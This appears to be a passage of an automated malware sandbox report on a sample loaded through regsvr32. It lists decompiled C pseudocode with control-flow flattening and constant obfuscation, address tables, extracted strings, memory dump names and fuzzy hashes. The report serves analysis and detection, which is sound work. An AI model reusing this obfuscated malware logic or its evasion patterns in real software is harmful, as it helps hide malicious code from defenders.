							_v88 = 0xb91113;
							_v88 = _v88 ^ 0x9147796c;
							_v88 = _v88 + 0xffffed42;
							_v88 = _v88 / _t400;
							_v88 = _v88 ^ 0x1d3cc220;
							_v84 = 0x123116;
							_v84 = _v84 + 0xd235;
							_v84 = _v84 * 0x4a;
							_v84 = _v84 * 0x12;
							_t127 =  &_v84;
							 *_t127 = _v84 ^ 0x62edac72;
							__eflags =  *_t127;
							E04F7531F(_v48, _v44, _v32, _t438, _v72, _v88, _v84);
							_t440 =  &(_t440[5]);
							L17:
							_t433 = 0x4f1bc;
							goto L10;
						} else {
							if(_t433 == 0xe74a) {
								_v48 = 0x788744;
								_v48 = _v48 + 0xffffe8ea;
								_v48 = _v48 ^ 0x0078702f;
								_v52 = 0xa8397f;
								_v52 = _v52 << 3;
								_v52 = _v52 ^ 0x0541a931;
								_v44 = 0xfd429c;
								_t436 = 0x59;
								_v44 = _v44 / _t436;
								_v44 = _v44 ^ 0x0009ecec;
								_t383 = E04F744FD(_v52, _t392,  *_t430, _v48, _v44); // executed
								_t440 =  &(_t440[3]);
								_v40 = _t383;
								__eflags = _t383;
								_t437 = 0xf2eb6;
								_t384 = 0x68f73;
								goto L13;
							} else {
								if(_t433 == 0x11183) {
									_t433 = 0xd3cfb;
									continue;
								} else {
									if(_t433 == 0x343f4) {
										_v44 = 0xe7a2a2;
										_v44 = _v44 >> 9;
										_v44 = _v44 ^ 0x982e76ba;
										_v44 = _v44 ^ 0x982a7b96;
										_v52 = 0xcf8248;
										_v52 = _v52 << 1;
										_v52 = _v52 ^ 0x0193afb9;
										_v48 = 0x672a12;
										_v48 = _v48 >> 0xf;
										_t344 =  &_v48;
										 *_t344 = _v48 ^ 0x00023bde;
										__eflags =  *_t344;
										_t385 = E04F7E4B2(_v44, _v52,  *_t344, _v48, _t391); // executed
										return _t385;
									}
									if(_t433 == 0x4e532) {
										_v48 = 0x33a4bf;
										_v48 = _v48 << 0xc;
										_v48 = _v48 ^ 0x3a478635;
										_v44 = 0xd67370;
										_push(_t392);
										_v44 = _v44 * 0x45;
										_v44 = _v44 ^ 0x39c20567;
										_t389 = E04F73EE6(_t392, _v36, __eflags);
										_t438 = _t389;
										_t437 = 0x343f4;
										__eflags = _t389;
										_t384 = 0xf2e12;
										L13:
										_t433 =  !=  ? _t384 : _t437;
										goto L10;
									} else {
										if(_t433 != 0x4f1bc) {
											L28:
											__eflags = _t433 - 0xfc28b;
											if(__eflags != 0) {
												goto L1;
											}
										} else {
											_v84 = 0xbef515;
											_v84 = _v84 + 0xffffdd8f;
											_v84 = _v84 >> 4;
											_v84 = _v84 | 0x21c668c5;
											_v84 = _v84 ^ 0x21c975ad;
											_v88 = 0x124fd0;
											_v88 = _v88 ^ 0xe4f026bd;
											_v88 = _v88 + 0x3e59;
											_v88 = _v88 + 0xffffc9cb;
											_v88 = _v88 ^ 0xe4ed5b28;
											_v44 = 0x4a504;
											_v44 = _v44 >> 0xc;
											_v44 = _v44 ^ 0x000cbb23;
											E04F7E4B2(_v84, _v88, _v44, _v44, _t438);
											_t433 = 0x343f4;
											L10:
											_t352 = _v60;
											L11:
											_t392 = _v68;
											_t411 = _v64;
											while(1) {
												_t442 = _t433 - 0x55fb8;
												if(_t442 <= 0) {
												}
												goto L18;
											}
											goto L3;
										}
									}
								}
							}
						}
						L31:
						return _t352;
						L18:
						__eflags = _t433 - 0x68f73;
						if(_t433 == 0x68f73) {
							_v80 = 0x1ee498;
							_v80 = _v80 << 0xa;
							_v80 = _v80 + 0xffff13e2;
							_v80 = _v80 >> 6;
							_v80 = _v80 ^ 0x01ee45ce;
							_v76 = 0x45f048;
							_t393 = 0x45;
							_v76 = _v76 / _t393;
							_v76 = _v76 + 0xffff8909;
							_v76 = _v76 + 0x50ac;
							_v76 = _v76 ^ 0x000a5fa7;
							_v44 = 0x61b089;
							_t394 = 0x78;
							_v44 = _v44 / _t394;
							_v44 = _v44 + 0xffff45cd;
							_v44 = _v44 ^ 0x000b742c;
							_v48 = 0x150e6;
							_v48 = _v48 >> 6;
							_v48 = _v48 ^ 0x000b193d;
							_v72 = 0x9e2f8f;
							_v72 = _v72 << 0xa;
							_v72 = _v72 ^ 0xd919987f;
							_v72 = _v72 << 0xc;
							_v72 = _v72 ^ 0x7a46bd1b;
							__eflags = E04F7C86A(_v80, _t438, _v76, _v44,  &_v20, _v48, _v40, _v36, _v72);
							_v48 = 0x53c157;
							_t433 =  !=  ? 0x55fb8 : 0xf2eb6;
							_v48 = _v48 >> 6;
							_v48 = _v48 ^ 0x000244b9;
							_v44 = 0x8c234d;
							_v44 = _v44 | 0x7af7b076;
							_v44 = _v44 ^ 0x5e9d058b;
							_t323 =  &_v44;
							 *_t323 = _v44 ^ 0x246292aa;
							__eflags =  *_t323;
							_t352 = E04F7F296(_v48, _v40, _v44);
							_t392 = _v68;
							_t440 =  &(_t440[8]);
							_t411 = _v64;
							goto L28;
						} else {
							__eflags = _t433 - 0xd3cfb;
							if(__eflags == 0) {
								_v72 = 0xf0d0d2;
								_v72 = _v72 >> 5;
								_v72 = _v72 + 0x7664;
								_v72 = _v72 + 0xffff48bf;
								_v72 = _v72 ^ 0x00039249;
								_v44 = 0x334989;
								_v44 = _v44 | 0x85338258;
								_v44 = _v44 << 1;
								_v44 = _v44 ^ 0x0a64f1fb;
								_push(_t392); // executed
								_t352 = E04F73EE6(_t392, _t411, __eflags); // executed
								_t391 = _t352;
								__eflags = _t391;
								if(__eflags != 0) {
									_t433 = 0x4e532;
									goto L10;
								}
							} else {
								__eflags = _t433 - 0xf2e12;
								if(_t433 == 0xf2e12) {
									_v72 = 0x45ad52;
									_v72 = _v72 | 0xdb4ac4e5;
									_v72 = _v72 >> 2;
									_v72 = _v72 + 0x236b;
									_v72 = _v72 ^ 0x36d7e7dc;
									_v76 = 0x2c5aa4;
									_v76 = _v76 << 0xf;
									_v76 = _v76 << 4;
									_v76 = _v76 >> 5;
									_v76 = _v76 ^ 0x06a2bc35;
									_v80 = 0x306bbe;
									_v80 = _v80 * 0x5d;
									_v80 = _v80 ^ 0x1b78769d;
									_v80 = _v80 | 0x9667d96d;
									_v80 = _v80 ^ 0x9ee1110a;
									_v44 = 0x400824;
									_v44 = _v44 | 0x71ccc00b;
									_v44 = _v44 + 0xffff3dbe;
									_v44 = _v44 ^ 0x71c00ea7;
									_v88 = 0xf97e53;
									_v88 = _v88 | 0xf7eddfff;
									_v88 = _v88 ^ 0xf7ff4623;
									_v84 = 0x25031b;
									_v84 = _v84 << 1;
									_v84 = _v84 ^ 0x0ad59d5f;
									_v84 = _v84 ^ 0x0a9a52a0;
									_v48 = 0x6bbf1;
									_v48 = _v48 ^ 0x9c2184a2;
									_v48 = _v48 ^ 0x94b1eef8;
									_v48 = _v48 ^ 0x0892238e;
									_v52 = 0x96cbba;
									_v52 = _v52 ^ 0x442d90d7;
									_v52 = _v52 + 0xffff3617;
									_v52 = _v52 ^ 0x44bc9e46;
									_v56 = 0x22489c;
									_v56 = _v56 << 0xa;
									_v56 = _v56 * 0x74;
									_v56 = _v56 ^ 0x23941ef3;
									_t367 = E04F6FE80(_v72, _v76, _v80, _t392, _t392, _v44, _t411,  &_v28, _v88,  &_v24, _v84, _v48, _t392, _t392, _t391, _t392, _t392, _v52, _v56);
									_t440 =  &(_t440[0x11]);
									__eflags = _t367;
									if(__eflags == 0) {
										goto L17;
									} else {
										_v44 = 0xbd94a6;
										_v44 = _v44 << 0xe;
										_v44 = _v44 ^ 0x305d7a02;
										_v44 = _v44 ^ 0x5574fa22;
										_v72 = 0x55202a;
										_v72 = _v72 ^ 0xda9a9660;
										_v72 = _v72 * 0x4a;
										_v72 = _v72 * 0x3f;
										_v72 = _v72 ^ 0xc2a1ea09;
										_t371 = E04F7F3A3();
										_t433 = 0xe74a;
										_t352 = _v28 * 0x2c + _t391;
										_t432 = _t371 % _v44 * 0x2c + _t391;
										_v60 = _t352;
										__eflags = _t432 - _t352;
										_t430 =  >=  ? _t391 : _t432;
									}
									goto L11;
								} else {
									__eflags = _t433 - 0xf2eb6;
									if(_t433 != 0xf2eb6) {
										goto L28;
									} else {
										_t430 = _t430 + 0x2c;
										__eflags = _t430 - _t352;
										asm("sbb esi, esi");
										_t433 = (_t433 & 0xfffbf58e) + 0x4f1bc;
										continue;
									}
								}
							}
						}
						goto L31;
					}
				}
			}

0x04f70f57
0x04f70f5e
0x04f70f64
0x04f70f68
0x04f70f6c
0x04f70f70
0x04f70f71
0x04f70f72
0x04f70f77
0x04f70f7f
0x04f70f81
0x04f70f89
0x04f70f8c
0x04f70f94
0x04f70f99
0x04f70f9d
0x04f70f9f
0x04f70fa7
0x04f70faf
0x04f70fb7
0x04f70fbb
0x04f70fc3
0x04f70fcb
0x04f70fd7
0x04f70fdb
0x04f70fdf
0x04f70fe3
0x04f70fe3
0x04f70fe3
0x04f70fe7
0x04f70fe7
0x04f70fed
0x04f70fed
0x04f70ff3
0x04f70ff3
0x04f71198
0x04f711a2
0x04f711aa
0x04f711b2
0x04f711c1
0x04f711c2
0x04f711c6
0x04f711ce
0x04f711db
0x04f711df
0x04f711e4
0x04f711ec
0x04f711f4
0x04f711fc
0x04f7120a
0x04f7120e
0x04f71216
0x04f7121e
0x04f7122b
0x04f71234
0x04f71238
0x04f71238
0x04f71238
0x04f71259
0x04f7125e
0x04f71261
0x04f71261
0x00000000
0x04f70ff9
0x04f70fff
0x04f7111f
0x04f71129
0x04f71131
0x04f71139
0x04f71141
0x04f71146
0x04f7114e
0x04f7115c
0x04f71161
0x04f71165
0x04f7117b
0x04f71180
0x04f71183
0x04f71187
0x04f71189
0x04f7118e
0x00000000
0x04f71005
0x04f7100b
0x04f71115
0x00000000
0x04f71011
0x04f71017
0x04f7163b
0x04f71643
0x04f71648
0x04f71650
0x04f71658
0x04f71660
0x04f71664
0x04f7166c
0x04f71674
0x04f71679
0x04f71679
0x04f71679
0x04f7168e
0x00000000
0x04f71694
0x04f71023
0x04f710c5
0x04f710cd
0x04f710d2
0x04f710da
0x04f710e7
0x04f710e8
0x04f710ec
0x04f710fc
0x04f71101
0x04f71103
0x04f71109
0x04f7110b
0x04f71110
0x04f71110
0x00000000
0x04f71029
0x04f7102f
0x04f7162e
0x04f7162e
0x04f71634
0x00000000
0x04f71636
0x04f71035
0x04f71035
0x04f7103d
0x04f71045
0x04f7104a
0x04f71052
0x04f7105a
0x04f71062
0x04f7106a
0x04f71072
0x04f7107a
0x04f71082
0x04f7108a
0x04f7108f
0x04f710a4
0x04f710ab
0x04f710b0
0x04f710b0
0x04f710b4
0x04f710b4
0x04f710b8
0x04f70fe7
0x04f70fe7
0x04f70fed
0x04f70fed
0x00000000
0x04f70fed
0x00000000
0x04f70fe7
0x04f7102f
0x04f71023
0x04f7100b
0x04f70fff
0x04f7169c
0x04f7169c
0x04f7126b
0x04f7126b
0x04f71271
0x04f714f7
0x04f71501
0x04f71506
0x04f7150e
0x04f71513
0x04f7151b
0x04f71529
0x04f7152e
0x04f71534
0x04f7153c
0x04f71544
0x04f7154c
0x04f71558
0x04f7155d
0x04f71565
0x04f7156d
0x04f71575
0x04f7157d
0x04f71582
0x04f7158a
0x04f71592
0x04f71597
0x04f7159f
0x04f715a4
0x04f715d2
0x04f715d4
0x04f715e6
0x04f715e9
0x04f715ee
0x04f715f6
0x04f715fe
0x04f71606
0x04f7160e
0x04f7160e
0x04f7160e
0x04f7161e
0x04f71623
0x04f71627
0x04f7162a
0x00000000
0x04f71277
0x04f71277
0x04f7127d
0x04f71493
0x04f7149b
0x04f714a0
0x04f714a8
0x04f714b0
0x04f714b8
0x04f714c0
0x04f714c8
0x04f714cc
0x04f714dc
0x04f714dd
0x04f714e2
0x04f714e5
0x04f714e7
0x04f714ed
0x00000000
0x04f714ed
0x04f71283
0x04f71283
0x04f71289
0x04f712af
0x04f712b7
0x04f712bf
0x04f712c4
0x04f712cc
0x04f712d4
0x04f712dc
0x04f712e1
0x04f712e6
0x04f712eb
0x04f712f3
0x04f71300
0x04f71304
0x04f7130c
0x04f71314
0x04f7131c
0x04f71324
0x04f7132c
0x04f71334
0x04f7133c
0x04f71344
0x04f7134c
0x04f71354
0x04f7135c
0x04f71360
0x04f71370
0x04f71378
0x04f71380
0x04f71388
0x04f71390
0x04f71398
0x04f713a0
0x04f713a8
0x04f713b0
0x04f713b8
0x04f713c0
0x04f713ca
0x04f713d2
0x04f7140c
0x04f71411
0x04f71414
0x04f71416
0x00000000
0x04f7141c
0x04f7141c
0x04f71424
0x04f71429
0x04f71431
0x04f71439
0x04f71441
0x04f7144e
0x04f71457
0x04f7145b
0x04f71467
0x04f71479
0x04f71481
0x04f71483
0x04f71485
0x04f71489
0x04f7148b
0x04f7148b
0x00000000
0x04f7128b
0x04f7128b
0x04f71291
0x00000000
0x04f71297
0x04f71297
0x04f7129a
0x04f7129c
0x04f712a4
0x00000000
0x04f712a4
0x04f71291
0x04f71289
0x04f7127d
0x00000000
0x04f71271
0x04f70fe7

Strings

* U, xrefs: 04F71439
([, xrefs: 04F7107A
~V', xrefs: 04F711AA
dv, xrefs: 04F714A0
'Kdw, xrefs: 04F711E4

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 'Kdw$([$* U$dv$~V'
API String ID: 0-604013667
Opcode ID: 4e41c010cab82f5b89c87f64147c93a34506757e519639ee7971380e394300b6
Instruction ID: 977d11109e6f971b4e97d91a5b9b38111b66b6fd4a6d94f15bcb2e11104b97a3
Opcode Fuzzy Hash: 4e41c010cab82f5b89c87f64147c93a34506757e519639ee7971380e394300b6
Instruction Fuzzy Hash: 5902F072508381AFC388CF25D98940BFBF1BBC4748F505A2DF59696260D3B9DA098F87

Uniqueness

Uniqueness Score: -1.00%

Function 04F7202D Relevance: 6.5, Strings: 5, Instructions: 207
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04F7202D() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				void* _t199;
				void* _t201;
				void* _t206;
				intOrPtr _t212;
				intOrPtr _t230;
				signed int _t231;
				signed int _t234;
				intOrPtr _t242;
				void* _t249;
				signed int* _t252;

				_t252 =  &_v1064;
				_v1048 = 0xad95f;
				_t199 = 0x67394;
				_v1044 = 0x41b75;
				_t249 = 0;
				do {
					while(_t199 != 0x80f0) {
						if(_t199 == 0x1042b) {
							_v1064 = 0xdcff7c;
							_t231 = 0x22;
							_v1064 = _v1064 * 0x1e;
							_v1064 = _v1064 / _t231;
							_v1064 = _v1064 ^ 0x00cfdf20;
							_v1060 = 0xd5c354;
							_v1060 = _v1060 ^ 0xa353b6dc;
							_v1060 = _v1060 >> 4;
							_v1060 = _v1060 + 0xffff63bc;
							_v1060 = _v1060 ^ 0x0a3ab2c6;
							_v1052 = 0x7fbcda;
							_v1052 = _v1052 ^ 0x2408e46f;
							_v1052 = _v1052 << 1;
							_v1052 = _v1052 + 0xb645;
							_v1052 = _v1052 ^ 0x48e71136;
							_v1048 = 0xf5965;
							_v1048 = _v1048 + 0xae85;
							_v1048 = _v1048 ^ 0x001340b5;
							_t206 = E04F7D6A7(_v1064, _v1060, _v1052, 0x4f613ec, _v1048);
							_v1064 = 0x68b049;
							_v1064 = _v1064 + 0xffffe7c7;
							_v1064 = _v1064 << 7;
							_v1064 = _v1064 * 0xf;
							_v1064 = _v1064 ^ 0x107a2925;
							_v1056 = 0x823cca;
							_v1056 = _v1056 >> 9;
							_v1056 = _v1056 * 0x62;
							_v1056 = _v1056 << 3;
							_v1056 = _v1056 ^ 0x00ca666b;
							_v1048 = 0x9e0f56;
							_v1048 = _v1048 + 0x807e;
							_v1048 = _v1048 | 0xed847267;
							_v1048 = _v1048 ^ 0xed9b804d;
							_v1052 = 0x3dea9b;
							_v1052 = _v1052 << 0xd;
							_v1052 = _v1052 + 0xf94c;
							_v1052 = _v1052 ^ 0x218f7538;
							_v1052 = _v1052 ^ 0x9cd852bd;
							_v1060 = 0x272c8a;
							_v1060 = _v1060 | 0xa801d0fb;
							_v1060 = _v1060 * 3;
							_v1060 = _v1060 * 0x69;
							_v1060 = _v1060 ^ 0xe93f236f;
							_t212 =  *0x4f8221c; // 0x33fd420
							_t242 =  *0x4f8221c; // 0x33fd420
							E04F736BB(_t242 + 4, __eflags, _v1064, _v1056, _t212 + 0x220, _v1048, _v1052, _t206, _v1060,  &_v1040);
							_v1060 = 0x12d894;
							_t234 = 0x13;
							_v1060 = _v1060 / _t234;
							_v1060 = _v1060 ^ 0x000799c3;
							_v1056 = 0xd28fe8;
							_v1056 = _v1056 + 0x79ab;
							_v1056 = _v1056 << 0xe;
							_v1056 = _v1056 >> 0xf;
							_v1056 = _v1056 ^ 0x000f8033;
							_v1048 = 0x39253a;
							_v1048 = _v1048 ^ 0x595e5568;
							_t160 =  &_v1048; // 0x595e5568
							_v1048 =  *_t160 * 0x23;
							_v1048 = _v1048 ^ 0x3925568e;
							_v1064 = 0x69caee;
							_v1064 = _v1064 + 0x7847;
							_v1064 = _v1064 + 0xffff3146;
							_v1064 = _v1064 + 0xffffb05c;
							_v1064 = _v1064 ^ 0x0060f8f6;
							_t176 =  &_v1060; // 0x595e5568
							_t230 =  *_t176;
							E04F6845B(_t230, _v1056, _v1048, _v1064, _t206);
							_t252 =  &(_t252[0xe]);
							_t199 = 0x80f0;
							continue;
						} else {
							if(_t199 == 0x67394) {
								_t199 = 0xd7758;
								continue;
							} else {
								if(_t199 == 0xd7758) {
									_v1064 = 0x4fa95e;
									_v1064 = _v1064 + 0xfffff048;
									_v1064 = _v1064 * 0x36;
									_v1064 = _v1064 ^ 0x10ce9b96;
									_v1052 = 0x44af6c;
									_v1052 = _v1052 | 0xd277355a;
									_v1052 = _v1052 * 0x21;
									_v1052 = _v1052 ^ 0x3d67f846;
									_v1052 = _v1052 ^ 0x1c0a64ad;
									E04F75B9E(_v1064,  &_v520, __eflags, _v1052);
									_t230 = _t230;
									_t199 = 0x1042b;
									continue;
								} else {
									if(_t199 != 0xf46cc) {
										goto L12;
									} else {
										_v1060 = 0xa43625;
										_v1060 = _v1060 * 0x43;
										_v1060 = _v1060 ^ 0x2affccf7;
										_v1056 = 0x1241ce;
										_v1056 = _v1056 + 0x232b;
										_v1056 = _v1056 ^ 0x001182f5;
										_v1048 = 0x1c78a1;
										_v1048 = _v1048 * 0x33;
										_v1048 = _v1048 ^ 0x05a683e6;
										_v1064 = 0xdf8f70;
										_v1064 = _v1064 * 0x7b;
										_v1064 = _v1064 << 0xb;
										_v1064 = _v1064 | 0x66d82b34;
										_v1064 = _v1064 ^ 0x6fd2bdbc;
										E04F6E51F(_v1060, _v1056, _v1064,  &_v1040, _v1048, _v1064); // executed
									}
								}
							}
						}
						L7:
						return _t249;
					}
					_v1056 = 0xfd8c58;
					_v1056 = _v1056 + 0xffffd3d1;
					_v1056 = _v1056 ^ 0x00fe0492;
					_v1048 = 0x525b82;
					_v1048 = _v1048 + 0xffffcce1;
					_v1048 = _v1048 ^ 0x2d3c4d7f;
					_v1048 = _v1048 ^ 0x2d6217be;
					_v1064 = 0xb79ae3;
					_v1064 = _v1064 ^ 0xeeb417b7;
					_v1064 = _v1064 ^ 0xee0ab9ca;
					_t201 = E04F785A7( &_v1040, _v1056, __eflags,  &_v520, _v1048, _v1064); // executed
					_t252 =  &(_t252[3]);
					_t230 = 1;
					__eflags = _t201;
					_t199 = 0xf46cc;
					_t249 =  !=  ? 1 : _t249;
					L12:
					__eflags = _t199 - 0x6b1b7;
				} while (__eflags != 0);
				goto L7;
			}

0x04f7202d
0x04f7203b
0x04f72044
0x04f72046
0x04f7204e
0x04f72055
0x04f72055
0x04f72065
0x04f72192
0x04f721a3
0x04f721a4
0x04f721ae
0x04f721b2
0x04f721ba
0x04f721c2
0x04f721ca
0x04f721cf
0x04f721d7
0x04f721df
0x04f721e7
0x04f721ef
0x04f721f3
0x04f721fb
0x04f72203
0x04f7220b
0x04f72213
0x04f72230
0x04f72235
0x04f7223f
0x04f7224a
0x04f72254
0x04f72258
0x04f72260
0x04f72268
0x04f72272
0x04f72276
0x04f7227b
0x04f72283
0x04f7228b
0x04f72293
0x04f7229b
0x04f722a3
0x04f722ab
0x04f722b0
0x04f722b8
0x04f722c0
0x04f722c8
0x04f722d0
0x04f722dd
0x04f722e6
0x04f722ee
0x04f72304
0x04f72313
0x04f72321
0x04f72326
0x04f72336
0x04f72339
0x04f7233d
0x04f72345
0x04f7234d
0x04f72355
0x04f7235a
0x04f7235f
0x04f72367
0x04f7236f
0x04f72377
0x04f7237d
0x04f72381
0x04f72389
0x04f72391
0x04f72399
0x04f723a1
0x04f723a9
0x04f723bd
0x04f723bd
0x04f723c1
0x04f723c6
0x04f723c9
0x00000000
0x04f7206b
0x04f7206d
0x04f7218b
0x00000000
0x04f72073
0x04f72075
0x04f72120
0x04f7212f
0x04f7213d
0x04f72141
0x04f72149
0x04f72151
0x04f7215e
0x04f72162
0x04f7216a
0x04f7217a
0x04f72180
0x04f72181
0x00000000
0x04f7207b
0x04f72080
0x00000000
0x04f72086
0x04f72086
0x04f72093
0x04f72097
0x04f7209f
0x04f720a7
0x04f720af
0x04f720b7
0x04f720c4
0x04f720c8
0x04f720d0
0x04f720dd
0x04f720e5
0x04f720ea
0x04f720f2
0x04f7210b
0x04f72110
0x04f72080
0x04f72075
0x04f7206d
0x04f72113
0x04f7211f
0x04f7211f
0x04f723d3
0x04f723e2
0x04f723ee
0x04f723f6
0x04f723fe
0x04f72406
0x04f7240e
0x04f72416
0x04f7241e
0x04f72426
0x04f7243b
0x04f72442
0x04f72445
0x04f72446
0x04f72448
0x04f7244d
0x04f72450
0x04f72450
0x04f72450
0x00000000

Strings

Gx, xrefs: 04F72391
o#?, xrefs: 04F722EE
hU^Y, xrefs: 04F72377
+#, xrefs: 04F720A7
Xw, xrefs: 04F72050

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +#$Gx$Xw$hU^Y$o#?
API String ID: 0-2812333995
Opcode ID: 3b02e2f082919bc10aa469e58ef2c9eda3b60d49cf390b518fbfdd884143ff22
Instruction ID: cc60094eb79dcfad19906fe1fa12dddb0f71efafbe4cddb64edc6e8fafb93dab
Opcode Fuzzy Hash: 3b02e2f082919bc10aa469e58ef2c9eda3b60d49cf390b518fbfdd884143ff22
Instruction Fuzzy Hash: 9EB1EE715093829BC358CF24D58980BBBE1BBD8758F404E1EF1D6A6260D7B8DA09CF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F69587 Relevance: 5.2, Strings: 4, Instructions: 228
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E04F69587() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t199;
				intOrPtr* _t202;
				signed int _t210;
				intOrPtr _t215;
				signed int _t222;
				void* _t223;
				signed int _t225;
				signed int _t229;
				signed int _t234;
				signed int _t236;
				signed int _t240;
				void* _t261;
				char _t265;
				signed int* _t266;
				void* _t268;

				_t266 =  &_v44;
				_t265 = _v28;
				_t223 = 0;
				_t260 = _v28;
				_t261 = 0x22d83;
				_v32 = 0x5ed09;
				goto L1;
				do {
					while(1) {
						L1:
						_t268 = _t261 - 0x7d501;
						if(_t268 > 0) {
							break;
						}
						if(_t268 == 0) {
							_v40 = 0xaceb23;
							_v40 = _v40 + 0xdb4f;
							_t229 = 0x12;
							_v40 = _v40 / _t229;
							_v40 = _v40 << 0xa;
							_v40 = _v40 ^ 0x26953171;
							_v44 = 0xdbb250;
							_v44 = _v44 + 0xffffb754;
							_v44 = _v44 * 0x2a;
							_t189 =  &_v44;
							 *_t189 = _v44 ^ 0x23fe585a;
							__eflags =  *_t189;
							E04F7C4E3(_t260, _v40, _v44);
							L23:
							return _t223;
						}
						if(_t261 == 0x154d8) {
							_v32 = 0xf0ee65;
							_v32 = _v32 >> 7;
							_v32 = _v32 ^ 0x000b4035;
							_v44 = 0xb30800;
							_v44 = _v44 * 0x50;
							_v44 = _v44 << 6;
							_v44 = _v44 ^ 0xfca5330a;
							_v36 = 0xc4b231;
							_v36 = _v36 << 0xb;
							_v36 = _v36 ^ 0x259392c0;
							_v40 = 0x31d3a5;
							_v40 = _v40 << 0xf;
							_v40 = _v40 + 0x4ae0;
							_v40 = _v40 + 0xc4d2;
							_v40 = _v40 ^ 0xe9da493a;
							_t210 = E04F654B9(_v32, _v44,  &_v16,  &_v24, _v36, _v40);
							_t266 =  &(_t266[4]);
							asm("sbb esi, esi");
							_t261 = ( ~_t210 & 0xfffd9b47) + 0xf240a;
							continue;
						}
						if(_t261 == 0x22d83) {
							_t261 = 0xb02c7;
							continue;
						}
						if(_t261 == 0x2a551) {
							_v36 = 0x144c19;
							_t261 = 0x7d501;
							_v36 = _v36 ^ 0xb22048c1;
							_v36 = _v36 ^ 0xb23404db;
							__eflags = _v28 - _v36;
							if(_v28 > _v36) {
								_v40 = 0x45b40;
								_v40 = _v40 ^ 0x9d8ff1db;
								_v40 = _v40 | 0x9fa1e257;
								_v40 = _v40 + 0xffff7ed3;
								_v40 = _v40 ^ 0x9faae0f0;
								_v44 = 0xf6a309;
								_v44 = _v44 | 0x63f0eddb;
								_t236 = 0x2a;
								_v44 = _v44 / _t236;
								_v44 = _v44 ^ 0x00e73eb8;
								_v44 = _v44 ^ 0x028dd0f6;
								_t222 = E04F63FE5( *((intOrPtr*)(_t260 + 0xc)),  &_v20, _v40, _v44);
								_v24 = _t222;
								__eflags = _t222;
								if(_t222 != 0) {
									_t261 = 0x154d8;
								}
							}
							continue;
						}
						if(_t261 != 0x4ceba) {
							goto L20;
						}
						_v36 = 0xe013f4;
						_v36 = _v36 | 0x1d8e5530;
						_v36 = _v36 ^ 0x1de45200;
						_v44 = 0x53f56d;
						_v44 = _v44 + 0xffffa0b2;
						_t234 = 0xd;
						_v44 = _v44 / _t234;
						_v44 = _v44 << 4;
						_v44 = _v44 ^ 0x00680698;
						_v40 = 0xa37337;
						_v40 = _v40 | 0x3e4fb688;
						_v40 = _v40 ^ 0x3ee6f8db;
						_t215 = E04F69B2F(_v36, _v44, _v40, _t265,  &_v28); // executed
						_t260 = _t215;
						_t266 =  &(_t266[3]);
						if(_t215 == 0) {
							goto L23;
						} else {
							_t261 = 0x2a551;
							continue;
						}
					}
					__eflags = _t261 - 0xb02c7;
					if(_t261 == 0xb02c7) {
						_v44 = 0x9c043a;
						_v44 = _v44 + 0x46e8;
						_v44 = _v44 | 0x8c72bfe6;
						_t225 = 0x61;
						_v44 = _v44 / _t225;
						_v44 = _v44 ^ 0x017a3a61;
						_v40 = 0xa68294;
						_v40 = _v40 ^ 0xe34b0060;
						_v40 = _v40 << 9;
						_v40 = _v40 * 0x2c;
						_t167 =  &_v40;
						 *_t167 = _v40 ^ 0xa5076af5;
						__eflags =  *_t167;
						_t265 = E04F6CDF8(_t225);
						_t261 = 0x4ceba;
						goto L20;
					}
					__eflags = _t261 - 0xcbf51;
					if(_t261 == 0xcbf51) {
						_v40 = 0xb3e7fc;
						_v40 = _v40 | 0xbfcd1725;
						_v40 = _v40 + 0xffff19e5;
						_v40 = _v40 ^ 0xbfff11e3;
						_v44 = 0x9d213a;
						_v44 = _v44 | 0xd14067b3;
						_v44 = _v44 ^ 0x96498d48;
						_v44 = _v44 ^ 0x479735f9;
						_v32 = 0xe19f02;
						_v32 = _v32 + 0xceaf;
						_v32 = _v32 ^ 0x00e3244b;
						_t141 =  &_v32; // 0xe3244b
						_t199 =  *0x4f8221c; // 0x33fd420
						E04F79C6A(_v40 + _v8, _v44, _t199 + 0x220, _v12,  *_t141);
						_t202 =  *0x4f8221c; // 0x33fd420
						_t266 =  &(_t266[3]);
						_t223 = 1;
						_t261 = 0xf240a;
						 *_t202 = _v16;
						goto L1;
					}
					__eflags = _t261 - 0xf240a;
					if(__eflags != 0) {
						goto L20;
					}
					_v36 = 0xd3d038;
					_v36 = _v36 << 0xd;
					_v36 = _v36 ^ 0x7a0667f7;
					_v32 = 0xdc51da;
					_t240 = 0x2f;
					_v32 = _v32 / _t240;
					_v32 = _v32 ^ 0x000eec5e;
					_v40 = 0xf2de61;
					_v40 = _v40 * 0x2b;
					_v40 = _v40 + 0xffffa80f;
					_v40 = _v40 ^ 0x28cf5e8b;
					E04F7E4B2(_v36, _v32, __eflags, _v40, _v24);
					_t261 = 0x7d501;
					goto L1;
					L20:
					__eflags = _t261 - 0xa7d17;
				} while (_t261 != 0xa7d17);
				goto L23;
			}

0x04f69587
0x04f6958c
0x04f69590
0x04f69594
0x04f69598
0x04f6959d
0x04f6959d
0x04f695a5
0x04f695a5
0x04f695a5
0x04f695a5
0x04f695ab
0x00000000
0x00000000
0x04f695b1
